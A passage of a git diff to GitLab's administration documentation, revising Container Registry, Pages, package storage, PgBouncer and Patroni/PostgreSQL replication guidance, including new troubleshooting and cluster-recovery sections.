that. It should be some principal that's guaranteed to be part of the key for all users who can log in to GitLab, or you must provide a list of principals, -one of which is present for the user, e.g.: +one of which is present for the user, for example: ```plaintext [...] @@ -131,7 +131,7 @@ principal is some "group" that's allowed to log into that server. However with GitLab it's only used to appease OpenSSH's requirement for it, we effectively only care about the "key ID" being correct. Once that's extracted GitLab enforces its own ACLs for -that user (e.g. what projects the user can access). +that user (for example, what projects the user can access). So it's OK to e.g. be overly generous in what you accept, since if the user e.g. has no access to GitLab at all it just errors out with a diff --git a/doc/administration/packages/container_registry.md b/doc/administration/packages/container_registry.md index a6829b90f18..74483b65c4d 100644 --- a/doc/administration/packages/container_registry.md +++ b/doc/administration/packages/container_registry.md @@ -1025,15 +1025,15 @@ You may want to add the `-m` flag to [remove untagged manifests and unreferenced Before diving in to the following sections, here's some basic troubleshooting: 1. Check to make sure that the system clock on your Docker client and GitLab server have - been synchronized (e.g. via NTP). + been synchronized (for example, via NTP). 1. If you are using an S3-backed Registry, double check that the IAM permissions and the S3 credentials (including region) are correct. See [the sample IAM policy](https://docs.docker.com/registry/storage-drivers/s3/) for more details. -1. Check the Registry logs (e.g. `/var/log/gitlab/registry/current`) and the GitLab production logs - for errors (e.g. `/var/log/gitlab/gitlab-rails/production.log`). You may be able to find clues +1. Check the Registry logs (for example `/var/log/gitlab/registry/current`) and the GitLab production logs + for errors (for example `/var/log/gitlab/gitlab-rails/production.log`). You may be able to find clues there. ### Using self-signed certificates with Container Registry @@ -1359,7 +1359,7 @@ For Omnibus installations: [image upgrade](#images-upgrade)) steps. You should [stop](https://docs.gitlab.com/omnibus/maintenance/#starting-and-stopping) the registry service before replacing its binary and start it right after. No registry configuration changes are required. - + #### Source installations For source installations, locate your `registry` binary and temporarily replace it with the one @@ -1461,7 +1461,7 @@ no errors are generated by the curl commands. #### Running the Docker daemon with a proxy For Docker to connect through a proxy, you must start the Docker daemon with the -proper environment variables. The easiest way is to shutdown Docker (e.g. `sudo initctl stop docker`) +proper environment variables. The easiest way is to shutdown Docker (for example `sudo initctl stop docker`) and then run Docker by hand. As root, run: ```shell diff --git a/doc/administration/packages/index.md b/doc/administration/packages/index.md index 6440fb16fc6..2c2e3fc0442 100644 --- a/doc/administration/packages/index.md +++ b/doc/administration/packages/index.md @@ -26,6 +26,7 @@ The Package Registry supports the following formats: <tr><td><a href="https://docs.gitlab.com/ee/user/packages/nuget_repository/index.html">NuGet</a></td><td>12.8+</td></tr> <tr><td><a href="https://docs.gitlab.com/ee/user/packages/pypi_repository/index.html">PyPI</a></td><td>12.10+</td></tr> <tr><td><a href="https://docs.gitlab.com/ee/user/packages/generic_packages/index.html">Generic packages</a></td><td>13.5+</td></tr> +<tr><td><a href="https://docs.gitlab.com/ee/user/packages/helm_repository/index.html">Helm Charts</a></td><td>14.1+</td></tr> </table> </div> </div> @@ -237,3 +238,17 @@ For installations from source: ```shell RAILS_ENV=production sudo -u git -H bundle exec rake gitlab:packages:migrate ``` + +You can optionally track progress and verify that all packages migrated successfully. + +From the [PostgreSQL console](https://docs.gitlab.com/omnibus/settings/database.html#connecting-to-the-bundled-postgresql-database) +(`sudo gitlab-psql -d gitlabhq_production` for Omnibus GitLab), verify that `objectstg` below (where +`file_store=2`) has the count of all packages: + +```shell +gitlabhq_production=# SELECT count(*) AS total, sum(case when file_store = '1' then 1 else 0 end) AS filesystem, sum(case when file_store = '2' then 1 else 0 end) AS objectstg FROM packages_package_files; + +total | filesystem | objectstg +------+------------+----------- + 34 | 0 | 34 +``` diff --git a/doc/administration/pages/index.md b/doc/administration/pages/index.md index b9637f1b6f5..ea1e99524b8 100644 --- a/doc/administration/pages/index.md +++ b/doc/administration/pages/index.md @@ -64,7 +64,7 @@ Before proceeding with the Pages configuration, you must: 1. Configure a **wildcard DNS record**. 1. (Optional) Have a **wildcard certificate** for that domain if you decide to serve Pages under HTTPS. -1. (Optional but recommended) Enable [Shared runners](../../ci/runners/README.md) +1. (Optional but recommended) Enable [Shared runners](../../ci/runners/index.md) so that your users don't have to bring their own. 1. (Only for custom domains) Have a **secondary IP**. @@ -215,6 +215,24 @@ NOTE: `inplace_chroot` option might not work with the other features, such as [Pages Access Control](#access-control). The [GitLab Pages README](https://gitlab.com/gitlab-org/gitlab-pages#caveats) has more information about caveats and workarounds. +### Jailing mechanism disabled by default for API-based configuration + +Starting from GitLab 14.1 the [jailing/chroot mechanism is disabled by default](https://gitlab.com/gitlab-org/gitlab-pages/-/issues/589). +If you are using API-based configuration and the new [Zip storage architecture](#zip-storage) +there is nothing you need to do. + +If you run into any problems, [open a new issue](https://gitlab.com/gitlab-org/gitlab-pages/-/issues/new) +and enable the jail again by setting the environment variable: + +1. Edit `/etc/gitlab/gitlab.rb`. +1. Set the `DAEMON_ENABLE_JAIL` environment variable to `true` for GitLab Pages: + + ```ruby + gitlab_pages['env']['DAEMON_ENABLE_JAIL'] = "true" + ``` + +1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure). + ### Global settings Below is a table of all configuration settings known to Pages in Omnibus GitLab, @@ -268,8 +286,8 @@ control over how the Pages daemon runs and serves content in your environment. | `sentry_enabled` | Enable reporting and logging with Sentry, true/false. | | `sentry_environment` | The environment for Sentry crash reporting. | | `status_uri` | The URL path for a status page, for example, `/@status`. | -| `tls_max_version` | Specifies the maximum SSL/TLS version ("ssl3", "tls1.0", "tls1.1" or "tls1.2"). | -| `tls_min_version` | Specifies the minimum SSL/TLS version ("ssl3", "tls1.0", "tls1.1" or "tls1.2"). | +| `tls_max_version` | Specifies the maximum TLS version ("tls1.2" or "tls1.3"). | +| `tls_min_version` | Specifies the minimum TLS version ("tls1.2" or "tls1.3"). | | `use_http2` | Enable HTTP2 support. | | **`gitlab_pages['env'][]`** | | | `http_proxy` | Configure GitLab Pages to use an HTTP Proxy to mediate traffic between Pages and GitLab. Sets an environment variable `http_proxy` when starting Pages daemon. | @@ -373,9 +391,13 @@ When adding a custom domain, users are required to prove they own it by adding a GitLab-controlled verification code to the DNS records for that domain. If your user base is private or otherwise trusted, you can disable the -verification requirement. Go to **Admin Area > Settings > Preferences** and -uncheck **Require users to prove ownership of custom domains** in the **Pages** section. -This setting is enabled by default. +verification requirement: + +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Preferences**. +1. Expand **Pages**. +1. Clear the **Require users to prove ownership of custom domains** checkbox. + This setting is enabled by default. ### Let's Encrypt integration @@ -388,9 +410,11 @@ sites served under a custom domain. To enable it, you must: 1. Choose an email address on which you want to receive notifications about expiring domains. -1. Go to your instance's **Admin Area > Settings > Preferences** and expand **Pages** settings. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Preferences**. +1. Expand **Pages**. 1. Enter the email address for receiving notifications and accept Let's Encrypt's Terms of Service as shown below. -1. Click **Save changes**. +1. Select **Save changes**.  @@ -442,11 +466,12 @@ The scope to use for authentication must match the GitLab Pages OAuth applicatio pre-existing applications must modify the GitLab Pages OAuth application. Follow these steps to do this: -1. Go to your instance's **Admin Area > Settings > Applications** and expand **GitLab Pages** - settings. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Applications**. +1. Expand **GitLab Pages**. 1. Clear the `api` scope's checkbox and select the desired scope's checkbox (for example, `read_api`). -1. Click **Save changes**. +1. Select **Save changes**. #### Disabling public access to all Pages websites @@ -460,9 +485,11 @@ This can be useful to preserve information published with Pages websites to the of your instance only. To do that: -1. Go to your instance's **Admin Area > Settings > Preferences** and expand **Pages** settings. -1. Check the **Disable public access to Pages sites** checkbox. -1. Click **Save changes**. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Preferences**. +1. Expand **Pages**. +1. Select the **Disable public access to Pages sites** checkbox. +1. Select **Save changes**. WARNING: For self-managed installations, all public websites remain private until they are @@ -635,30 +662,27 @@ Follow the steps below to configure the proxy listener of GitLab Pages. 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure). -## Set maximum pages size - -You can configure the maximum size of the unpacked archive per project in -**Admin Area > Settings > Preferences > Pages**, in **Maximum size of pages (MB)**. -The default is 100MB. - -### Override maximum pages size per project or group **(PREMIUM SELF)** +## Override maximum pages size per project or group **(PREMIUM SELF)** > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16610) in GitLab 12.7. NOTE: -Only GitLab admin users are able to view and override the **Maximum size of Pages** setting. +Only GitLab administrators are able to view and override the **Maximum size of Pages** setting. To override the global maximum pages size for a specific project: -1. Go to your project's **Settings > Pages** page. -1. Edit the **Maximum size of pages**. -1. Click **Save changes**. +1. On the top bar, select **Menu > Projects** and find your project. +1. On the left sidebar, select **Settings > Pages**. +1. Enter a value under **Maximum size of pages** in MB. +1. Select **Save changes**. To override the global maximum pages size for a specific group: -1. Go to your group's **Settings > General** page and expand **Pages**. -1. Edit the **Maximum size of pages**. -1. Click **Save changes**. +1. On the top bar, select **Menu > Groups** and find your group. +1. On the left sidebar, select **Settings > General**. +1. Expand **Pages**. +1. Enter a value under **Maximum size of pages** in MB. +1. Select **Save changes**. ## Running GitLab Pages on a separate server @@ -690,23 +714,14 @@ database encryption. Proceed with caution. gitlab_pages['access_control'] = true ``` +1. Configure [the object storage and migrate pages data to it](#using-object-storage). + 1. [Reconfigure the **GitLab server**](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect. The `gitlab-secrets.json` file is now updated with the new configuration. 1. Set up a new server. This becomes the **Pages server**. -1. Create an [NFS share](../nfs.md) - on the **Pages server** and configure this share to - allow access from your main **GitLab server**. - Note that the example there is more general and - shares several sub-directories from `/home` to several `/nfs/home` mount points. - For our Pages-specific example here, we instead share only the - default GitLab Pages folder `/var/opt/gitlab/gitlab-rails/shared/pages` - from the **Pages server** and we mount it to `/mnt/pages` - on the **GitLab server**. - Therefore, omit "Step 4" there. - 1. On the **Pages server**, install Omnibus GitLab and modify `/etc/gitlab/gitlab.rb` to include: @@ -725,7 +740,7 @@ database encryption. Proceed with caution. ``` 1. Copy the `/etc/gitlab/gitlab-secrets.json` file from the **GitLab server** - to the **Pages server**, for example via the NFS share. + to the **Pages server**. ```shell # On the GitLab server @@ -743,7 +758,6 @@ database encryption. Proceed with caution. pages_external_url "http://<pages_server_URL>" gitlab_pages['enable'] = false pages_nginx['enable'] = false - gitlab_rails['pages_path'] = "/mnt/pages" ``` 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect. @@ -797,7 +811,7 @@ To explicitly enable API source: 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect. -Or if you want to use legacy confiration source you can: +Or if you want to use legacy configuration source you can: 1. Add the following to your `/etc/gitlab/gitlab.rb` file: @@ -929,7 +943,7 @@ In installations from source: In GitLab 14.0 the underlying storage format of GitLab Pages is changing from files stored directly in disk to a single ZIP archive per project. -These ZIP archives can be stored either locally on disk storage or on the [object storage](#using-object-storage) if it is configured. +These ZIP archives can be stored either locally on disk storage or on [object storage](#using-object-storage) if it is configured. [Starting from GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/245308) ZIP archives are stored every time pages site is updated. @@ -991,9 +1005,8 @@ to using that. > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/325285) in GitLab 13.11. -Existing Pages deployments objects (which store [ZIP archives](#zip-storage)) can similarly be -migrated to [object storage](#using-object-storage), if -you've been having them stored locally. +Existing Pages deployment objects (which store [ZIP archives](#zip-storage)) can similarly be +migrated to [object storage](#using-object-storage). Migrate your existing Pages deployments from local storage to object storage: @@ -1003,7 +1016,7 @@ sudo gitlab-rake gitlab:pages:deployments:migrate_to_object_storage ### Rolling Pages deployments back to local storage -After the migration to object storage is performed, you can choose to revert your Pages deployments back to local storage: +After the migration to object storage is performed, you can choose to move your Pages deployments back to local storage: ```shell sudo gitlab-rake gitlab:pages:deployments:migrate_to_local @@ -1013,7 +1026,7 @@ sudo gitlab-rake gitlab:pages:deployments:migrate_to_local > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/301159) in GitLab 13.11. -If you use [object storage](#using-object-storage), disable local storage: +If you use [object storage](#using-object-storage), you can disable local storage: 1. Edit `/etc/gitlab/gitlab.rb`: @@ -1027,22 +1040,22 @@ Starting from GitLab 13.12, this setting also disables the [legacy storage](#mig ## Migrate GitLab Pages to 14.0 -In GitLab 14.0 a number of breaking changes are introduced which may require some user intervention. +In GitLab 14.0 a number of breaking changes were introduced which may require some user intervention. The steps below describe the best way to migrate without causing any downtime for your GitLab instance. -If you run GitLab on a single server, then most likely you will not notice any problem after -upgrading to GitLab 14.0, but it may be safer to follow the steps anyway. -If you run GitLab on a single server, then most likely the upgrade process to 14.0 will go smoothly for you. Regardless, we recommend everyone follow the migration steps to ensure a successful upgrade. +If you run GitLab on a single server, then most likely the upgrade process to 14.0 will go smoothly for you +and you will not notice any problem after upgrading. +Regardless, we recommend everyone follow the migration steps to ensure a successful upgrade. If at any point you run into issues, consult the [troubleshooting section](#troubleshooting). -To migrate GitLab Pages to GitLab 14.0: +If your current GitLab version is lower than 13.12, then you first need to update to 13.12. +Updating directly to 14.0 is [not supported](../../update/index.md#upgrade-paths) +and may cause downtime for some web-sites hosted on GitLab Pages. Once you update to 13.12, +migrate GitLab Pages to prepare them for GitLab 14.0: -1. If your current GitLab version is lower than 13.12, then you first need to upgrade to 13.12. -Upgrading directly to 14.0 may cause downtime for some web-sites hosted on GitLab Pages -until you finish the following steps. 1. Set [`domain_config_source` to `gitlab`](#domain-source-configuration-before-140), which is the default starting from GitLab 14.0. Skip this step if you're already running GitLab 14.0 or above. -1. If you want to store your pages content in the [object storage](#using-object-storage), make sure to configure it. +1. If you want to store your pages content in [object storage](#using-object-storage), make sure to configure it. If you want to store the pages content locally or continue using an NFS server, skip this step. 1. [Migrate legacy storage to ZIP storage.](#migrate-legacy-storage-to-zip-storage) 1. Upgrade GitLab to 14.0. @@ -1126,18 +1139,44 @@ open /opt/gitlab/embedded/ssl/certs/cacert.pem: no such file or directory x509: certificate signed by unknown authority ``` -The reason for those errors is that the files `resolv.conf` and `ca-bundle.pem` are missing inside the `chroot`. -The fix is to copy the host's `/etc/resolv.conf` and the GitLab certificate bundle inside the `chroot`: +The reason for those errors is that the files `resolv.conf`, `/etc/hosts/`, `/etc/nsswitch.conf` and `ca-bundle.pem` are missing inside the `chroot`. +The fix is to copy these files inside the `chroot`: ```shell sudo mkdir -p /var/opt/gitlab/gitlab-rails/shared/pages/etc/ssl sudo mkdir -p /var/opt/gitlab/gitlab-rails/shared/pages/opt/gitlab/embedded/ssl/certs/ -sudo cp /etc/resolv.conf /var/opt/gitlab/gitlab-rails/shared/pages/etc +sudo cp /etc/resolv.conf /var/opt/gitlab/gitlab-rails/shared/pages/etc/ +sudo cp /etc/hosts /var/opt/gitlab/gitlab-rails/shared/pages/etc/ +sudo cp /etc/nsswitch.conf /var/opt/gitlab/gitlab-rails/shared/pages/etc/ sudo cp /opt/gitlab/embedded/ssl/certs/cacert.pem /var/opt/gitlab/gitlab-rails/shared/pages/opt/gitlab/embedded/ssl/certs/ sudo cp /opt/gitlab/embedded/ssl/certs/cacert.pem /var/opt/gitlab/gitlab-rails/shared/pages/etc/ssl/ca-bundle.pem ``` +### `unsupported protocol scheme \"\""` + +If you see the following error: + +```plaintext +{"error":"failed to connect to internal Pages API: Get \"/api/v4/internal/pages/status\": unsupported protocol scheme \"\"","level":"warning","msg":"attempted to connect to the API","time":"2021-06-23T20:03:30Z"} +``` + +It means you didn't set the HTTP(S) protocol scheme in the Pages server settings. +To fix it: + +1. Edit `/etc/gitlab/gitlab.rb`: + + ```ruby + gitlab_pages['gitlab_server'] = "https://<your_pages_domain_name>" + gitlab_pages['internal_gitlab_server'] = "https://<your_pages_domain_name>" + ``` + +1. Reconfigure GitLab: + + ```shell + sudo gitlab-ctl reconfigure + ``` + ### 502 error when connecting to GitLab Pages proxy when server does not listen over IPv6 In some cases, NGINX might default to using IPv6 to connect to the GitLab Pages @@ -1256,9 +1295,14 @@ Upgrading to an [officially supported operating system](https://about.gitlab.com ### The requested scope is invalid, malformed, or unknown -This problem comes from the permissions of the GitLab Pages OAuth application. To fix it, go to -**Admin > Applications > GitLab Pages** and edit the application. Under **Scopes**, ensure that the -`api` scope is selected and save your changes. +This problem comes from the permissions of the GitLab Pages OAuth application. To fix it: + +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Applications > GitLab Pages**. +1. Edit the application. +1. Under **Scopes**, ensure that the `api` scope is selected. +1. Save your changes. + When running a [separate Pages server](#running-gitlab-pages-on-a-separate-server), this setting needs to be configured on the main GitLab server. @@ -1316,6 +1360,24 @@ To enable disk access: 1. [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure). +### `httprange: new resource 403` + +If you see an error similar to: + +```plaintext +{"error":"httprange: new resource 403: \"403 Forbidden\"","host":"root.pages.example.com","level":"error","msg":"vfs.Root","path":"/pages1/","time":"2021-06-10T08:45:19Z"} +``` + +And you run pages on the separate server syncing files via NFS, it may mean that +the shared pages directory is mounted on a different path on the main GitLab server and the +GitLab Pages server. + +In that case, it's highly recommended you to configure +[object storage and migrate any existing pages data to it](#using-object-storage). + +Alternatively, you can mount the GitLab Pages shared directory to the same path on +both servers. + ### GitLab Pages doesn't work after upgrading to GitLab 14.0 or above GitLab 14.0 introduces a number of changes to GitLab Pages which may require manual intervention. @@ -1323,6 +1385,12 @@ GitLab 14.0 introduces a number of changes to GitLab Pages which may require man 1. Firstly [follow the migration guide](#migrate-gitlab-pages-to-140). 1. If it doesn't work, see [GitLab Pages logs](#how-to-see-gitlab-pages-logs), and if you see any errors there then search them on this page. +The most common problem is when using [`inplace_chroot`](#dial-tcp-lookup-gitlabexamplecom-and-x509-certificate-signed-by-unknown-authority). + +NOTE: +Starting from 14.1, the chroot/jailing mechanism is +[disabled by default for API-based configuration](#jailing-mechanism-disabled-by-default-for-api-based-configuration). + WARNING: As the last resort you can temporarily enable legacy storage and configuration mechanisms. Support for them [will be removed in GitLab 14.3](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/6166), so GitLab Pages will stop working if don't resolve the underlying issue. diff --git a/doc/administration/pages/source.md b/doc/administration/pages/source.md index f1c3b515f68..4aaf430db97 100644 --- a/doc/administration/pages/source.md +++ b/doc/administration/pages/source.md @@ -61,7 +61,7 @@ Before proceeding with the Pages configuration, make sure that: Pages artifacts. 1. (Optional) You have a **wildcard certificate** for the Pages domain if you decide to serve Pages (`*.example.io`) under HTTPS. -1. (Optional but recommended) You have configured and enabled the [shared runners](../../ci/runners/README.md) +1. (Optional but recommended) You have configured and enabled the [shared runners](../../ci/runners/index.md) so that your users don't have to bring their own. ### DNS configuration @@ -443,9 +443,14 @@ are stored. ## Set maximum Pages size -The maximum size of the unpacked archive per project can be configured in -**Admin Area > Settings > Preferences > Pages**, in **Maximum size of pages (MB)**. -The default is 100MB. +The default for the maximum size of unpacked archives per project is 100 MB. + +To change this value: + +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Preferences**. +1. Expand **Pages**. +1. Update the value for **Maximum size of pages (MB)**. ## Backup diff --git a/doc/administration/polling.md b/doc/administration/polling.md index d3f558eeaaa..ec5d6cd45d8 100644 --- a/doc/administration/polling.md +++ b/doc/administration/polling.md @@ -7,7 +7,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Polling configuration **(FREE SELF)** The GitLab UI polls for updates for different resources (issue notes, issue -titles, pipeline statuses, etc.) on a schedule appropriate to the resource. +titles, pipeline statuses, and so on) on a schedule appropriate to the resource. To configure the polling interval multiplier: diff --git a/doc/administration/postgresql/pgbouncer.md b/doc/administration/postgresql/pgbouncer.md index e481fcb71f4..4f9056b9b50 100644 --- a/doc/administration/postgresql/pgbouncer.md +++ b/doc/administration/postgresql/pgbouncer.md @@ -52,6 +52,20 @@ This content has been moved to a [new location](replication_and_failover.md#conf } ``` + You can pass additional configuration parameters per database, for example: + + ```ruby + pgbouncer['databases'] = { + gitlabhq_production: { + ... + pool_mode: 'transaction' + } + } + ``` + + Use these parameters with caution. For the complete list of parameters refer to the + [PgBouncer documentation](https://www.pgbouncer.org/config.html#section-databases). + 1. Run `gitlab-ctl reconfigure` 1. On the node running Puma, make sure the following is set in `/etc/gitlab/gitlab.rb` diff --git a/doc/administration/postgresql/replication_and_failover.md b/doc/administration/postgresql/replication_and_failover.md index b6d2e36851d..d1dd233f08b 100644 --- a/doc/administration/postgresql/replication_and_failover.md +++ b/doc/administration/postgresql/replication_and_failover.md @@ -97,8 +97,8 @@ This is why you will need: - IP address of each nodes network interface. This can be set to `0.0.0.0` to listen on all interfaces. It cannot be set to the loopback address `127.0.0.1`. -- Network Address. This can be in subnet (i.e. `192.168.0.0/255.255.255.0`) - or CIDR (i.e. `192.168.0.0/24`) form. +- Network Address. This can be in subnet (that is, `192.168.0.0/255.255.255.0`) + or CIDR (that is, `192.168.0.0/24`) form. #### Consul information @@ -157,6 +157,13 @@ We will need the following password information for the application's database u sudo gitlab-ctl pg-password-md5 POSTGRESQL_USERNAME ``` +#### Patroni information + +We will need the following password information for the Patroni API: + +- `PATRONI_API_USERNAME`. A username for basic auth to the API +- `PATRONI_API_PASSWORD`. A password for basic auth to the API + #### PgBouncer information When using default setup, minimum configuration requires: @@ -236,6 +243,11 @@ postgresql['sql_replication_password'] = 'POSTGRESQL_REPLICATION_PASSWORD_HASH' # Replace POSTGRESQL_PASSWORD_HASH with a generated md5 value postgresql['sql_user_password'] = 'POSTGRESQL_PASSWORD_HASH' +# Replace PATRONI_API_USERNAME with a username for Patroni Rest API calls (use the same username in all nodes) +patroni['username'] = 'PATRONI_API_USERNAME' +# Replace PATRONI_API_PASSWORD with a password for Patroni Rest API calls (use the same password in all nodes) +patroni['password'] = 'PATRONI_API_PASSWORD' + # Sets `max_replication_slots` to double the number of database nodes. # Patroni uses one extra slot per node when initiating the replication. patroni['postgresql']['max_replication_slots'] = X @@ -246,7 +258,7 @@ patroni['postgresql']['max_replication_slots'] = X patroni['postgresql']['max_wal_senders'] = X+1 # Replace XXX.XXX.XXX.XXX/YY with Network Address -postgresql['trust_auth_cidr_addresses'] = %w(XXX.XXX.XXX.XXX/YY) +postgresql['trust_auth_cidr_addresses'] = %w(XXX.XXX.XXX.XXX/YY 127.0.0.1/32) # Replace placeholders: # @@ -259,8 +271,8 @@ consul['configuration'] = { # END user configuration ``` -You do not need an additional or different configuration for replica nodes. As a matter of fact, you don't have to have -a predetermined primary node. Therefore all database nodes use the same configuration. +All database nodes use the same configuration. The leader node is not determined in configuration, +and there is no additional or different configuration for either leader or replica nodes. Once the configuration of a node is done, you must [reconfigure Omnibus GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) on each node for the changes to take effect. @@ -555,10 +567,12 @@ gitlab_rails['auto_migrate'] = false postgresql['pgbouncer_user_password'] = '771a8625958a529132abe6f1a4acb19c' postgresql['sql_user_password'] = '450409b85a0223a214b5fb1484f34d0f' +patroni['username'] = 'PATRONI_API_USERNAME' +patroni['password'] = 'PATRONI_API_PASSWORD' patroni['postgresql']['max_replication_slots'] = 6 patroni['postgresql']['max_wal_senders'] = 7 -postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/16) +postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/16 127.0.0.1/32) # Configure the Consul agent consul['services'] = %w(postgresql) @@ -642,12 +656,15 @@ postgresql['sql_user_password'] = '450409b85a0223a214b5fb1484f34d0f' # Patroni uses one extra slot per node when initiating the replication. patroni['postgresql']['max_replication_slots'] = 6 +patroni['username'] = 'PATRONI_API_USERNAME' +patroni['password'] = 'PATRONI_API_PASSWORD' + # Set `max_wal_senders` to one more than the number of replication slots in the cluster. # This is used to prevent replication from using up all of the # available database connections. patroni['postgresql']['max_wal_senders'] = 7 -postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/16) +postgresql['trust_auth_cidr_addresses'] = %w(10.6.0.0/16 127.0.0.1/32) consul['configuration'] = { server: true, @@ -721,6 +738,97 @@ functional or does not have a leader, Patroni and by extension PostgreSQL will n API which can be accessed via its [default port](https://docs.gitlab.com/omnibus/package-information/defaults.html#patroni) on each node. +### Check replication status + +Run `gitlab-ctl patroni members` to query Patroni for a summary of the cluster status: + +```plaintext ++ Cluster: postgresql-ha (6970678148837286213) ------+---------+---------+----+-----------+ +| Member | Host | Role | State | TL | Lag in MB | ++-------------------------------------+--------------+---------+---------+----+-----------+ +| gitlab-database-1.example.com | 172.18.0.111 | Replica | running | 5 | 0 | +| gitlab-database-2.example.com | 172.18.0.112 | Replica | running | 5 | 100 | +| gitlab-database-3.example.com | 172.18.0.113 | Leader | running | 5 | | ++-------------------------------------+--------------+---------+---------+----+-----------+ +``` + +To verify the status of replication: + +```shell +echo 'select * from pg_stat_wal_receiver\x\g\x \n select * from pg_stat_replication\x\g\x' | gitlab-psql +``` + +The same command can be run on all three database servers, and will return any information +about replication available depending on the role the server is performing. + +The leader should return one record per replica: + +```sql +-[ RECORD 1 ]----+------------------------------ +pid | 371 +usesysid | 16384 +usename | gitlab_replicator +application_name | gitlab-database-1.example.com +client_addr | 172.18.0.111 +client_hostname | +client_port | 42900 +backend_start | 2021-06-14 08:01:59.580341+00 +backend_xmin | +state | streaming +sent_lsn | 0/EA13220 +write_lsn | 0/EA13220 +flush_lsn | 0/EA13220 +replay_lsn | 0/EA13220 +write_lag | +flush_lag | +replay_lag | +sync_priority | 0 +sync_state | async +reply_time | 2021-06-18 19:17:14.915419+00 +``` + +Investigate further if: + +- There are missing or extra records. +- `reply_time` is not current. + +The `lsn` fields relate to which write-ahead-log segments have been replicated. +Run the following on the leader to find out the current LSN: + +```shell +echo 'SELECT pg_current_wal_lsn();' | gitlab-psql +``` + +If a replica is not in sync, `gitlab-ctl patroni members` indicates the volume +of missing data, and the `lag` fields indicate the elapsed time. + +Read more about the data returned by the leader +[in the PostgreSQL documentation](https://www.postgresql.org/docs/12/monitoring-stats.html#PG-STAT-REPLICATION-VIEW), +including other values for the `state` field. + +The replicas should return: + +```sql +-[ RECORD 1 ]---------+------------------------------------------------------------------------------------------------- +pid | 391 +status | streaming +receive_start_lsn | 0/D000000 +receive_start_tli | 5 +received_lsn | 0/EA13220 +received_tli | 5 +last_msg_send_time | 2021-06-18 19:16:54.807375+00 +last_msg_receipt_time | 2021-06-18 19:16:54.807512+00 +latest_end_lsn | 0/EA13220 +latest_end_time | 2021-06-18 19:07:23.844879+00 +slot_name | gitlab-database-1.example.com +sender_host | 172.18.0.113 +sender_port | 5432 +conninfo | user=gitlab_replicator host=172.18.0.113 port=5432 application_name=gitlab-database-1.example.com +``` + +Read more about the data returned by the replica +[in the PostgreSQL documentation](https://www.postgresql.org/docs/12/monitoring-stats.html#PG-STAT-WAL-RECEIVER-VIEW). + ### Selecting the appropriate Patroni replication method [Review the Patroni documentation carefully](https://patroni.readthedocs.io/en/latest/SETTINGS.html#postgresql) @@ -1017,6 +1125,134 @@ postgresql['trust_auth_cidr_addresses'] = %w(123.123.123.123/32 <other_cidrs>) [Reconfigure GitLab](../restart_gitlab.md#omnibus-gitlab-reconfigure) for the changes to take effect. +### Reinitialize a replica + +If replication is not occurring, it may be necessary to reinitialize a replica. + +1. On any server in the cluster, determine the Cluster and Member names, + and check the replication lag by running `gitlab-ctl patroni members`. Here is an example: + + ```plaintext + + Cluster: postgresql-ha (6970678148837286213) ------+---------+---------+----+-----------+ + | Member | Host | Role | State | TL | Lag in MB | + +-------------------------------------+--------------+---------+---------+----+-----------+ + | gitlab-database-1.example.com | 172.18.0.111 | Replica | running | 5 | 0 | + | gitlab-database-2.example.com | 172.18.0.112 | Replica | running | 5 | 100 | + | gitlab-database-3.example.com | 172.18.0.113 | Leader | running | 5 | | + +-------------------------------------+--------------+---------+---------+----+-----------+ + ``` + +1. Reinitialize the affected replica server: + + ```plaintext + gitlab-ctl patroni reinitialize-replica postgresql-ha gitlab-database-2.example.com + ``` + +### Reset the Patroni state in Consul + +WARNING: +This is a destructive process and may lead the cluster into a bad state. Make sure that you have a healthy backup before running this process. + +As a last resort, if your Patroni cluster is in an unknown/bad state and no node can start, you can +reset the Patroni state in Consul completely, resulting in a reinitialized Patroni cluster when +the first Patroni node starts. + +To reset the Patroni state in Consul: + +1. Take note of the Patroni node that was the leader, or that the application thinks is the current leader, if the current state shows more than one, or none. One way to do this is to look on the PgBouncer nodes in `/var/opt/gitlab/consul/databases.ini`, which contains the hostname of the current leader. +1. Stop Patroni on all nodes: + + ```shell + sudo gitlab-ctl stop patroni + ``` + +1. Reset the state in Consul: + + ```shell + /opt/gitlab/embedded/bin/consul kv delete -recurse /service/postgresql-ha/ + ``` + +1. Start one Patroni node, which will initialize the Patroni cluster and be elected as a leader. + It's highly recommended to start the previous leader (noted in the first step), + in order to not lose existing writes that may have not been replicated because + of the broken cluster state: + + ```shell + sudo gitlab-ctl start patroni + ``` + +1. Start all other Patroni nodes that will join the Patroni cluster as replicas: + + ```shell + sudo gitlab-ctl start patroni + ``` + +If you are still seeing issues, the next step is restoring the last healthy backup. + +### Errors in the Patroni log about a `pg_hba.conf` entry for `127.0.0.1` + +The following log entry in the Patroni log indicates the replication is not working +and a configuration change is needed: + +```plaintext +FATAL: no pg_hba.conf entry for replication connection from host "127.0.0.1", user "gitlab_replicator" +``` + +To fix the problem, ensure the loopback interface is included in the CIDR addresses list: + +1. Edit `/etc/gitlab/gitlab.rb`: + + ```ruby + postgresql['trust_auth_cidr_addresses'] = %w(<other_cidrs> 127.0.0.1/32) + ``` + +1. [Reconfigure 